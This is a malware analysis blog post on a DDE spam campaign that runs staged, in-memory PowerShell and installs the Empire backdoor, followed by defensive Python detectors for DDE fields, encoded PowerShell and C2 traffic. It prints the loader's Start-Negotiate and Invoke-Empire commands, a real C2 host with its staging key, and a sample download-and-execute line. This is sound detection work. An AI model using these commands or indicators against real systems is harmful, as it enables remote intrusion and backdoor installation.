Threat Research
Stay on top of the latest threat research, information on in-the-wild cyber attacks and cyber operations from Juniper Threat Labs.
Macro-less Document and Fileless Malware: the perfect cloaking mechanism for new threats


At the onset of the discovery of DDE command execution attacks in October, Juniper Threat Labs discovered a series of spam messages using this technique. Dynamic Data Exchange (DDE) is a protocol and feature in MS Word and MS Excel for sharing data between applications. Security researchers discovered that this feature can be abused to gain command execution. Below are some of the spam campaigns that Cyphort has detected that arose from this discovery.


Figure (spam1.png): IRS spam campaign. SHA-256 of doc: 0cfab9a3365f4aabaabca4f31206d1c2d8cf82608c46af9b39d37a0936923987


Figure (spam2.png): Efax spam campaign. Docx SHA-256: a1a4dbb3e8edbc1e49f16c9183ba9b70125e671c94edd10b5552b7ba365da541


Figure (spam3.png): RBC Secure spam campaign. Docx SHA-256: 9de0e9ac4bf682a965f3240a0d3353173086a31cafaf7dad80889e52ef7b21dc


In one example, a malicious file launches several stages of powershell scripts in memory. The attack is fileless (aside from the doc): it does not need to write anything to disk and involves only powershell scripts running in memory. The communication with the C2 server is also over SSL, which makes this threat harder to detect. The final payload is an open source powershell backdoor called “Empire”.


Figure (infection_chain.png): Infection chain

Stage 1

During our research, we identified the following malware.

File Name: Pelan Strategik PRU14 - 2.docx

Sha256: befed4808484c9d9143c55e0977779aaae114a47def832a1837f3e78775e90c8

The file name is Malay and translates to “Strategic Plan PRU14 - 2.docx”.


Opening this file shows nothing (a blank document) except for a message box asking to enable the “DDE”. The user would need to click on the object for the DDE to trigger. Inside the docx file, “Document.xml” defines how the DDE will behave. The DDE can usually be spotted by the keywords “DDE” and “DDEAUTO”, although in some cases this is obfuscated by padding xml tags in between the letters. In this example, the DDEAUTO is easily spotted.


The DDEAUTO command is invoking cmd.exe, which executes powershell to download and execute a powershell script (0.ps1) from a Dropbox storage.
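The keyword search described above breaks as soon as the field instruction is split across several XML runs. The following Python scanner is an added example (not code from the original post or from Juniper Threat Labs) that opens a .docx, reassembles each field instruction from its `w:instrText` runs and `w:fldSimple` attributes, and reports any DDE/DDEAUTO field together with whether it launches a command shell. The `SAMPLE_XML` document and the `build_docx` helper are constructed for the example; the command inside the sample is a harmless placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# Field codes that make Word talk to another application.
DDE_FIELDS = re.compile(r"\b(DDEAUTO|DDE)\b", re.IGNORECASE)
# Programs an analyst would not expect a document field to launch.
SHELLS = re.compile(r"(cmd(\.exe)?|powershell|mshta|regsvr32|certutil)", re.IGNORECASE)


def field_instructions(docx_bytes):
    """Return every field instruction string in word/document.xml.

    Instruction text may be split across many <w:instrText> runs (the padding
    trick the post mentions), so runs between the fldChar begin/end markers are
    concatenated before inspection. <w:fldSimple> carries its instruction in
    the w:instr attribute instead.
    """
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    fields, current = [], None
    for el in root.iter():
        if el.tag == W + "fldSimple":
            fields.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                current = []
            elif kind == "end" and current is not None:
                fields.append("".join(current))
                current = None
        elif el.tag == W + "instrText" and current is not None:
            current.append(el.text or "")
    # Collapse whitespace so padded instructions compare cleanly.
    return [" ".join(f.split()) for f in fields]


def find_dde(docx_bytes):
    """Return (instruction, launches_shell) for each DDE/DDEAUTO field found."""
    hits = []
    for instr in field_instructions(docx_bytes):
        if DDE_FIELDS.search(instr):
            hits.append((instr, bool(SHELLS.search(instr))))
    return hits


def build_docx(document_xml):
    """Constructed helper: wrap a document.xml body in a minimal .docx zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed sample: the DDEAUTO keyword is split across runs, as the post
# describes; the command is a harmless placeholder, not the real payload.
SAMPLE_XML = (
    '<w:document xmlns:w="%s"><w:body><w:p>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText>DDE</w:instrText></w:r>'
    '<w:r><w:instrText>AUTO c:\\windows\\system32\\cmd.exe </w:instrText></w:r>'
    '<w:r><w:instrText>"/k echo placeholder"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>click to enable</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    '</w:p></w:body></w:document>' % W_NS
)

# Constructed benign document: an ordinary DATE field, no DDE.
BENIGN_XML = (
    '<w:document xmlns:w="%s"><w:body><w:p>'
    '<w:fldSimple w:instr="DATE \\@ &quot;yyyy-MM-dd&quot;"><w:r><w:t>2017-11-20</w:t></w:r></w:fldSimple>'
    '</w:p></w:body></w:document>' % W_NS
)

if __name__ == "__main__":
    for instr, shell in find_dde(build_docx(SAMPLE_XML)):
        print("DDE field:", instr, "| launches shell:", shell)
```

Because the scan works on the reassembled instruction rather than the raw XML bytes, tag padding between letters does not hide the keyword; a production version would also walk headers, footers and embedded documents, which carry the same field structure.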


Stage 2: 0.ps1


The downloaded powershell script is base64 encoded as shown by the following powershell process.


Figure (process_snapshot.png): Process snapshot

After decoding, it will resolve as follows:




The script will download the next stage of malware via SSL from “https://www(.)thestar(.)live:443/login/process(.)php”. The next stage is encrypted using AES-256. The first four bytes of the downloaded data, combined with the constant “505dd62e251005fa796e32e9651b6310,” are used as the key to decrypt the rest of the data, from the 5th byte to the end. The “IEX” command at the end indicates that the decrypted data is another powershell script, which is executed directly. IEX is an alias for “Invoke-Expression” in powershell.


The next stage is also hosted on a site served over HTTPS, which likely has an untrusted certificate. The script disables the SSL certificate check with the following command so that no warning popup is displayed:
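The process snapshot above and the certificate-check bypass are both visible from the endpoint side in the powershell command line, once its base64 argument is decoded. The following Python analyzer is an added example (not code from the original post or from Juniper Threat Labs) that pulls the `-EncodedCommand` argument out of a process command line (PowerShell accepts any unambiguous prefix such as `-e` or `-enc`), decodes it as the UTF-16LE text PowerShell expects, and lists the behaviours the post describes: download-and-IEX, use of `Net.WebClient`, and disabling certificate validation through `ServerCertificateValidationCallback`. The sample command lines are constructed for the example and point at a non-existent host.

```python
import base64
import re

# Behaviours worth flagging in a decoded PowerShell payload. Each one is
# described in the post: download and IEX of a script, and a disabled
# certificate check (ServerCertificateValidationCallback is the .NET hook
# commonly used for that).
INDICATORS = {
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.IGNORECASE),
    "web_download": re.compile(r"\b(DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|iwr)\b", re.IGNORECASE),
    "web_client": re.compile(r"Net\.WebClient", re.IGNORECASE),
    "cert_check_disabled": re.compile(r"ServerCertificateValidationCallback", re.IGNORECASE),
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
}


def encoded_payload(cmdline):
    """Return the base64 argument following -EncodedCommand (or a prefix such as -e, -enc), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        switch = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and switch and "encodedcommand".startswith(switch):
            return tokens[i + 1].strip("\"'")
    return None


def decode_payload(b64):
    """PowerShell expects UTF-16LE text under the base64; return None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(cmdline):
    """Decode an encoded PowerShell command line and report the indicators it contains."""
    result = {"encoded": False, "decoded": None, "indicators": [], "hidden_window": False, "no_profile": False}
    low = cmdline.lower()
    result["hidden_window"] = bool(re.search(r"[-/]w(indowstyle)?\s+hidden", low))
    result["no_profile"] = bool(re.search(r"[-/]nop(rofile)?\b", low))
    b64 = encoded_payload(cmdline)
    if b64 is None:
        return result
    result["encoded"] = True
    script = decode_payload(b64)
    if script is None:
        result["indicators"].append("undecodable_encodedcommand")
        return result
    result["decoded"] = script
    result["indicators"] = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return result


# Constructed sample modelled on the stage-1 behaviour the post describes:
# a certificate check switched off, then a script fetched and passed to IEX.
# The host is a placeholder that does not resolve.
SAMPLE_SCRIPT = (
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};"
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/0.ps1')"
)
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
BENIGN_CMDLINE = "powershell.exe -NoProfile -Command Get-Date"

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        r = analyze(line)
        print(line[:60], "...")
        print("  encoded:", r["encoded"], "hidden:", r["hidden_window"], "indicators:", r["indicators"])
```

Feeding process-creation telemetry (Sysmon event 1, or Windows 4688 with command-line logging enabled) through `analyze` surfaces the stage-1 launcher even though nothing is written to disk; pairing the hit with a parent of `WINWORD.EXE` or `cmd.exe` spawned by Word, as in the infection chain above, gives a high-confidence detection.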



Stage 3: Empire Loader

The downloaded data is another powershell script. This script downloads a further script from the same C2 server via SSL, this time from “/news.php”. The downloaded data is again encrypted with AES-256.



The script will execute the Start-Negotiate function with these parameters:


Start-Negotiate -s "https://www[.]thestar[.]live:443" -SK '505dd62e251005fa796e32e9651b6310' -UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';

It posts data to "https://www[.]thestar[.]live:443/news.php", which returns encrypted raw data.


The IEX command at the end of the function invokes the output of the call to “Decrypt-Bytes” function, which decrypts the raw data returned by the above network connection. The resulting decrypted data is the final payload, “Empire Backdoor”.


It will invoke the “Empire Backdoor” using the following command.


[GC]::CollecT();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
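The negotiation above leaves a recognisable footprint on the wire even though the payload itself is encrypted: a fetch of the stage-2 path, then POSTs to /news.php with the user agent passed to Start-Negotiate. The following Python scanner is an added example (not code from the original post or from Juniper Threat Labs) that refangs the indicators as printed in the post, parses constructed proxy log lines and reports which indicators each request matches. It assumes a TLS-inspecting proxy that logs the full URL and user agent; the log format and the sample lines are constructed for the example, and the user-agent comparison ignores whitespace so that it matches the UA whether or not its spaces survived.

```python
import re
from urllib.parse import urlsplit


def refang(indicator):
    """Turn a defanged indicator (www[.]thestar[.]live, www(.)thestar(.)live, hxxps://) back into its real form."""
    return (indicator.replace("[.]", ".").replace("(.)", ".")
            .replace("hxxp://", "http://").replace("hxxps://", "https://"))


# Indicators taken from the post, kept defanged in source and refanged at runtime.
C2_HOSTS = {refang("www[.]thestar[.]live")}
STAGE_PATHS = {"/login/process.php": "stage2_download", "/news.php": "empire_negotiate"}
EMPIRE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"


def same_ua(a, b):
    """Compare user agents ignoring whitespace."""
    return "".join(a.split()) == "".join(b.split())


# Constructed log format: timestamp client method url status "user-agent".
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec):
    """Return the names of the indicators this request matches."""
    u = urlsplit(rec["url"])
    host = u.hostname or ""
    hits = []
    if host in C2_HOSTS:
        hits.append("known_c2_host")
    if u.path in STAGE_PATHS:
        hits.append(STAGE_PATHS[u.path])
    # Behavioural match independent of the host: Empire's negotiation is a
    # POST to a .php path carrying the user agent given to Start-Negotiate.
    if rec["method"] == "POST" and u.path.endswith(".php") and same_ua(rec["ua"], EMPIRE_UA):
        hits.append("empire_default_ua_post_php")
    return hits


def scan(lines):
    """Return (client, url, hits) for every parseable request matching at least one indicator."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec:
            hits = classify(rec)
            if hits:
                out.append((rec["client"], rec["url"], hits))
    return out


# Constructed sample log: the stage-2 fetch, the negotiation POST, an
# unrelated request and an unparseable line.
SAMPLE_LOG = [
    '2017-11-20T09:58:10Z 10.0.0.5 GET https://www.thestar.live:443/login/process.php 200 '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '2017-11-20T09:58:12Z 10.0.0.5 POST https://www.thestar.live:443/news.php 200 '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
    '2017-11-20T09:58:15Z 10.0.0.9 GET https://example.invalid/news.html 200 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    'garbage line',
]

if __name__ == "__main__":
    for client, url, hits in scan(SAMPLE_LOG):
        print(client, url, ",".join(hits))
```

The host and path matches are tied to this campaign and will age out; the behavioural match on method, `.php` path and user agent survives a change of C2 domain, which is why it is kept separate from the IoC lookups.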

Payload: Empire - Powershell Backdoor


The final payload is a powershell backdoor called “Empire”. This backdoor/tool is publicly available in GitHub, “” with several modifications from



From the project's description:

“Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent and a pure Python 2.6/2.7 Linux/OS X agent. It is the mergence of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptological and secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premiered at HackMiami 2016.”

This does not mean that the creators of the backdoor in GitHub are the same actors behind this attack. It’s almost certain that other malicious actors are using the backdoor and weaponizing it for their own gain.

Looking at the modules, this backdoor is pretty dangerous.



The DDE feature has since been disabled to mitigate malware attacks that abuse it, but it took several weeks before Microsoft finally decided to disable it. During that span of time, we saw several threat actors use this technique for cybercrime activity. It is always important for people involved in security to stay on top of the current threat landscape.


Indicators of Compromise


Word Doc






Cyphort detects this threat as TROJAN_DOWNLOADER.DC




Sky ATP also detects this as follows:


